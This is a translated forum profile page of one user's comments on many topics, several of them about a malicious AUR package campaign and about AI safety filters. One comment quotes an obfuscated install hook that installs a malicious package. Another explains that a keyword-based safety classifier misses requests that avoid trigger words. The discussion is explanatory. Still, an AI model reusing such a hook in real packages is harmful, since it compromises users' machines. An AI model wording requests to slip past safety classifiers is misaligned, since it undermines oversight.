HackerTrans
TopNewTrendsCommentsPastAskShowJobs

cge

1,826 karmajoined 14 лет назад
A physicist-errant.

comments

cge
·позавчера·discuss
That's just presenting improvements to a mechanism; while it isn't common, particularly for watches, and I don't know much about earlier examples, they do seem to exist.

For clocks, however, there is the iconic Swiss railway clock [1], which dates back to 1944 and has a jumping minute. For those, however, the jump is actually meaningful in itself, in they're synchronized by a master clock that has a one minute impulse, and the jump is actually the moment of the impulse.

[1]: https://en.wikipedia.org/wiki/Swiss_railway_clock
cge
·позавчера·discuss
One of the significant problems with systems like automatic speed limits (and lane following, etc) is that they need to work well, and reliably, in all conditions, or they end up posing safety risks themselves. Potentially worse, the implementations often make assumptions based on affluent, developed, modern urban areas, while being implemented everywhere, and so end up being something between a nuisance and a safety hazard in less developed, less modern, and more rural areas.

Driving a rather new car with speeding warnings around the deep French countryside a few weeks ago, for example, when on a motorway, with a speed limit of 130 km/h, the car would repeatedly detect the speed limits on exits, which could mean the car suddenly thinking that the speed limit was 50 km/h until the next 130 km/h reminder sign. Fortunately, the car simply beeped incessantly, and so only posed a minor safety risk in being distracting (the beep could be turned off temporarily, but the override was unreliable). Off the motorway, small roads around ancient towns were often designed with the expectation that drivers would need to frequently drive across lines, so the lane-departure mechanism would frequently engage to try to push the car off the road, or into oncoming traffic (which might be a tractor itself significantly over the middle line out of necessity), though it was fortunately weak enough that it was easy to counteract. And on winding, tight streets in towns, the car's speed limit detection was often significantly wrong, in both directions.

A car, in the middle of 130 km/h traffic, that decides it needs to abruptly slow down to 50 km/h, ending up as essentially a road hazard with cars that could run into it at 80 km/h relative speed, is probably also a serious safety threat, and a system that did that would also threaten your kids' lives.

One might hope that consistent implementation of these sorts of systems would force a realization that they need to work in all places, and that the infrastructure in those places needs to be able to support them reliably. But what I see more often (not just in the EU; the US has similar problems) is that the systems work quite well in areas that 'matter', little is done to improve them in areas that don't (to be fair, sometimes local governments are at least partially at fault for this), the people who live in those areas are forced to deal with systems that seem harmful to them, and the result is an increasing political discontent.
cge
·4 дня назад·discuss
A perhaps similar sort of finder existed on a number of older (eg, first half of the 20th century) cameras, usually as a secondary option or an accessory, for quick shots. They tend to be common additions built into waist level finders because WLFs are slow to use and adding them is cheap; there’s one on the 1939 Praktiflex, as a random example, an early 35mm SLR with a pretty tiny WLF as its primary viewfinder.

Those usually work by having two square windows, the back larger than the front: you know you are looking at them the right way when they line up. They’re very approximate, but they’re meant to be.

Here, the camera has a thickness that is obscured by the face-on photos of it, so I expect it works by a similar principle: if you see the sides of the inside of the screen, you’re misaligned.
cge
·5 дней назад·discuss
That would be interesting to try, but unfortunately, at least on iOS, it’s region-locked by account region, so as someone who goes back and forth between the US and Europe often, despite being in Europe, I’m entirely unable to install it at all without making significant changes to my Apple account.
cge
·6 дней назад·discuss
On the one hand, the developers who were ultimately tasked directly with building Horizon were completely unqualified to write an accounting system, and lacked even basic knowledge about accounting in general, including fundamental misunderstandings about the very nature of double-entry and ledger-based accounting. From what I can remember from released correspondence, for example, Horizon had fundamental design mistakes that made it essentially not double-entry, particularly when multiple terminals were involved, even when not considering remote changes to accounts.

On the other, the severity of the consequences of the bugs in Horizon came from the behavior of Fujitsu management, the Post Office, and the judicial system, and I'm not sure that individual developers could have reasonably predicted that. The software was used under contracts that tried to make individual users personally liable even for shortfalls resulting from errors in the software. When accounts had shortfalls, the Post Office ignored even basic sanity in favor of insisting on Horizon's unerring accuracy. They abused esoteric powers of private investigation and private prosecution combined with their own vested interests to bring completely unreasonable prosecutions. They, along with parts of Fujitsu, repeatedly made false statements to courts about Horizon's basic operation, if often with enough distance from the actual developers to claim ignorance. The judicial system then operated under delusional and hubristic views on software development and practices around experts, witnesses, and coerced pleas that one might argue no reasonable person would have.

If a clearly negligent and unqualified engineer constructs part of an office building for a business with numerous avoidable tripping hazards that violate even basic standards, it seems reasonable that they might be liable for the injuries when employees trip on them. If it turns out that the business has a special right to shoot its employees with no consequences, decides that it would be better to shoot anyone who trips rather than admit to the building being fundamentally flawed, and then repeatedly has courts approve of its actions, I'm not so sure that the engineer should be held liable for mass murder.
cge
·18 дней назад·discuss
To add to the license complexity, the model uses another FUTO-written license, though it at least does not seem as bad as the license for the keyboard:

https://huggingface.co/futo-org/futo-swipe/blob/main/LICENSE...
cge
·20 дней назад·discuss
These sorts of services do seem very dependent on the details of how they are organized.

I’ve had experience with two university libraries with 3d printers. They both advertise them similarly, and they were nominally similar services, ostensibly letting students and staff both 3d print and learn about 3d printing.

At one, the arrangement was that they’d show you around the machines, give you a link to a list of notes and rules, and then you could come in and use the printers. If you wanted to do something unusual or use an exorbitant amount of filament, they asked that you talk to them first. That service is what initially introduced me to 3d printing.

At the other, the library staff decided they’d rather handle everything themselves. You’d submit an stl, then they’d print it at some point, potentially weeks later. Random color pla only, no slicing and providing gcode or even requests for settings. In practice staff decided they would only accept links to popular stls online; submitting your own stl would be rejected. They printed at such bad settings that everything would come out horribly. The service was worse than useless, taught nothing, and may well have turned many students off 3d printing entirely, if they thought the results were indicative of what 3d printing could do. We essentially have to warn students that the service is not practically usable.

But both, of course, say they have 3d printers.
cge
·20 дней назад·discuss
> It would be awesome if they supported something like Hurricane Electric’s tunneling.

HE tunnel IP space is now sufficiently penalized as non-residential/office that I’ve had to turn it off anyway. YouTube, for example, largely seems to block users in HE space unless they are logged in, and I frequently ran into neverending captchas.
cge
·24 дня назад·discuss
For both me (physics) and my wife (history), in the American system, both at strong universities, most of our committee members read most of of our dissertations. For her, in a field where thesis by publication is not standard (your thesis is typically revised into your first book), her committee at the defense focused on questions and comments based on the committee's reading of the thesis more than on the actual defense presentation, which is apparently also normal in the field. In part, I expect that's because the thesis is expected to be built into something important post-PhD, and comments are seen as helpful in that process.

For me, it wasn't quite so apparent at the defense, and I don't know that all members read the final thesis carefully, but most of them had already seen me publish or present most of the research previously, often multiple times. I also know that some (and not just my advisor) did read the final thesis very closely. My thesis was only partially thesis by publication, however, which may have influenced this; it does now have a fair number of citations in its own right, which is somewhat unusual for the theses in the field, and potentially seen as awkward (it means there's significant work in the thesis that I never published elsewhere).

As a caveat, the American system (before current crises) does feel like it can have a two-tier system of PhD students who are expected to remain in academia (we both were) and ones who are not, even at strong universities. Expectations, and attention given, can vary considerably. The American system also tends to have larger and more closely involved committees than, for example, the UK/Irish system.

However, for the form of plagiarism discussed here: if someone had sentences from papers I published years ago interspersed in their work, and they weren't particularly notable sentences, I'm not confident I would notice. Depending on citations and what the sentences were, I'm not even sure I'd mind much, for example, if they were essentially copying a model definition.
cge
·25 дней назад·discuss
> Clearly with LLMs, bulletproof denials are ~impossible due to the way LLMs work.

As a scientist who repeatedly ran into the classifier-based denials: it appears Anthropic’s strategy to make denials more robust, at the cost of many false positives, was to have a separate classifier processing both input and output tokens, at an extremely simple, almost keyword-search level. One weakness of this approach is that it only catches things that use the right keywords: it is in some sense weak exactly where an LLM-based classifier would be stronger.

Work on abstract, closer-to-CS algorithms that used chemistry terminology were blocked immediately, while work directly relevant to chemistry/biology experiments, writing code to process images from a very specific microscopy setup relevant primarily to biological samples, was never blocked at all, because it happened to never use relevant keywords.

That’s consistent with this situation: finding and fixing bugs in the context of looking for bugs perhaps happened to never use words like ‘exploit’ or ‘cybersecurity’.
cge
·27 дней назад·discuss
The reported commit [1] suggests to me that it was an account compromise of some sort, not orphan+adopt: the committer is the same in git, but the contact email changes in the PKGBUILD.

This doesn't necessarily seem 'more elaborate': it is attempting to be better obfuscated against automated checks at the cost of being very obvious to anyone doing even a cursory review of the install scripts. It's also likely something that would be caught instantly by even an extremely naive LLM, as seems to have been the case here. There's simply no legitimate reason why an install script would ever do something like this:

  diff --git a/htbrowser-bin-deps.install b/htbrowser-bin-deps.install
  new file mode 100644
  index 000000000000..9806501accad
  --- /dev/null
  +++ b/htbrowser-bin-deps.install
  @@ -0,0 +1,3 @@
  +post_install() {
  +  $'\x63'"d" "/"'t'"m"'p' && "b"'u''n' 'a'"d"'d' $'\141\x6e''s'"i""-"$'\143''o''l''o''r'$'\x73' 'n'"e"'x'"t""f"'i''l''e''-''j''s'
  +}

[1]: https://aur.archlinux.org/cgit/aur.git/commit/?h=htbrowser-b...
cge
·28 дней назад·discuss
>What some read as "gatekeeping" and "Arch Linux hostility" is in reality just a difference of culture, and that's not a bad thing.

Oddly enough, when I was writing that, I wasn't thinking about Arch, but Ubuntu. Years ago, I can remember a situation of a PPA being used for developing something I was involved in somehow, and while the PPA specifically noted that users shouldn't use it, they just did anyway, because they wanted what they saw as the latest and greatest versions of those packages. When the PPA owner added a package that set the default wallpaper to a warning about adding the PPA and updating all packages from it blindly, the users blamed them, rather than understanding the message. At the same time, I was actually using that repository legitimately, and it was useful.
cge
·28 дней назад·discuss
> They're packaged using the same tools and technology, with the intent that they can be easily validated and promoted to core stuff in the future.

That's perhaps the intent ideally, but in practice, it feels like AUR tends to be (a) niche, esoteric things that will never be anywhere outside of AUR, even if they could, or (b) installation methods for proprietary/otherwise non-open packages that can't be.

The latter seems to a major popular use of AUR: sorting packages by popularity or votes comes up with lists that seem to be mostly these. And that's likely a significant draw for non-technical users. If you want to install things like Dropbox, Chrome, VS Code, Minecraft, Zoom, Slack... they all show up in AUR. By their nature (usually extracting packages from upstream installation methods), they tend to be more complicated than generic AUR packages. They are also often quite a bit more convenient than using the upstream packages, which might not interface well with Archlinux, might only be available with installation methods that clobber things, might be deb/rpm only, etc.

I wonder if it would make sense to have a more trusted/vetted repository of these sorts of scripts, separate from core repositories but also not as free-for-all as AUR. That might go a long way toward keeping non-technical users from being drawn to AUR.
cge
·28 дней назад·discuss
I'm not asking for myself. Yes, I understand the build process, and know what to check. I've also written PKGBUILDs before and have had packages in AUR. I'm sure you understand it too, as well as many people here.

But many users don't. As far as I can tell, there is very little actual guidance about what to look for, not even to the extent of what you explain here, on the wiki. Users are told to check the PKGBUILD, and warned about AUR-helpers being dangerous, but in practice, it seems AUR-helpers are widely used, and many users likely just click through PKGBUILDs they won't be able to understand.

And, again, this attack was a relatively obvious one. Other attacks could be made much harder to notice.

Worse, distributions like CachyOS are being broadly promoted to a user base who can't be reasonably expected to check over AUR packages themselves. Unlike ArchLinux, those sometimes do seem to promote AUR-helpers. In some cases, those distributions are apparently including AUR-sourced packages in their actual repositories.

Questions about these topics often result in typical Archlinux hostility. And in some sense, that's understandable: there are other distributions that most users should be using, and the frustration of people using Archlinux who shouldn't be is wearing. It is nice to have a distribution that offers the flexibility and space for experimentation that Archlinux does. It's one of the reasons I use it on some of my machines, while at the same time recommending against most others using it.

To some extent, this is just a wide cultural difficulty with Linux, and there isn't a clear answer. On one hand, you want enough gatekeeping to keep users away from potentially dangerous systems they have no interest in understanding, and that they'll rely on without understanding in situations where they shouldn't. On the other, you don't want to keep out users who are interested in learning.
cge
·28 дней назад·discuss
>`rua` and other similar CLIs make it really easy to review the packages before installing them from AUR too, and if you are doing banking on the same computer, you really have no excuse not to review the software you depend on.

What review should users do?

It appears that, in some cases, these were adding npm as a dependency and installing atomic-lockfile, and in others, these were adding bun and installing js-digest. This was a mass attack against mostly low-use/orphaned/etc packages where maintainership was taken over or a different user uploaded a new version (itself a very simple, low-notice, low-oversight process), and many of the packages clearly had no connection to Node.js at all, so a user who knew enough about each package, and knew what npm was, might notice the oddity in the package, if they reviewed every line of the PKGBUILD, then reviewed the install scripts.

But legitimate AUR packages for packages connected to Node.js also use npm, for example, and at times, use npm install. A user would have to be familiar enough with Archlinux's build system to understand the difference between each part (eg, build() vs install scripts). They'd have to review every PKGBUILD, every install script, and every patch of every AUR package they install. For packages that actually do use npm/bun, they'd have to be familiar enough to know what uses were legitimate and what uses were not, and might have to be up to date on compromised dependencies. And this is still considering a mass attack that was not particularly hidden. Attacks could be made much harder to find.

Asking a user to safely review an AUR package essentially seems like it is asking them to fully understand not just the build process, and programming language, of the upstream package, but also all details of Archlinux's build system. They need to learn how to do this with, as far as I can tell, no real guidance: AUR itself, and the wiki's page on it, just warn that users should carefully review the PKGBUILD and install scripts, without giving any substantial guidance on what to look for or how to review anything. The warnings feel much more like liability-reduction than an attempt to be helpful.

At that point, what is AUR actually offering that installing the upstream package isn't? It feels like the suggested 'safe' way of using AUR would make it just as much work for the user, and require just as much knowledge, as either installing the upstream directly, or even making a package for it.

There is perhaps some room for LLM analysis here: Opus 4.8, Kimi latest, and even Qwen3.6 27B quickly catch at least the current round of malicious packages in my tests. But a motivated attacker could make that more difficult, or dangerous. And a user could also just have those models install the upstream package, with less risk. If they want to use pacman for management, they could likely even have those LLMs generate a package, with less risk.
cge
·29 дней назад·discuss
Europe does not consistently have KYC for phone service, at least for mobile connections. Normal phone companies in Ireland don't ask for information when buying SIMs (physical ones, at least). Some eSIM providers in Europe don't ask for information at all, and accept cryptocurrency payments. (I'm also aware that some other European countries have very different requirements, up to actually needing copies of identification.)

More widely, however, there do seem to be differences that I don't know the details of. VOIP seems quite different (I use it for my old phones): DID numbers in the US seem extremely cheap and available instantly, with little information, while European ones seem to have an actual verification process and prices that would make large-scale spamming difficult.
cge
·в прошлом месяце·discuss
The filter is not simply a bioweapons filter: the model card seems to say that the filter triggers on anything related to biology or chemistry.
cge
·в прошлом месяце·discuss
It appears that the blocking here is of a very different nature than for Opus. Whereas with Opus the blocks seem to be for messages it deems potentially harmful, for Fable, it appears the blocking is simply anything that falls within "topics related to cybersecurity, biology and chemistry, or distillation attempts".

So yes, straightforward biology work will get blocked, because the intention is that any biology work should get blocked. As a scientist, this is perhaps the most useless model I've ever tried.
cge
·в прошлом месяце·discuss
Different EU countries seem to heavily vary on this point. I’ve seen everything from requirements for id scans and addresses to esims that accept cryptocurrency as payment.
cge
·в прошлом месяце·discuss
The safety gates on this are extreme, and seem considerably wider than "cybersecurity and biology"; they seem to make it essentially unusable for scientists in a number of fields. I have, so far, been bumped back to Opus on 100% of my prompts.

It appears it can be tripped by things as simple as a mention of equilibrium, or anything involving something that looks like chemical kinetics, even at an abstract level. Even touching basic open source packages in my field will trigger it.

Edit: looking at the model card, it appears that chemistry in its entirety is also included in the banned topics; it's just the announcement that mentions only cybersecurity and biology. It also appears that the intent is to ban chemistry and biology entirely, rather than just banning messages deemed high risk.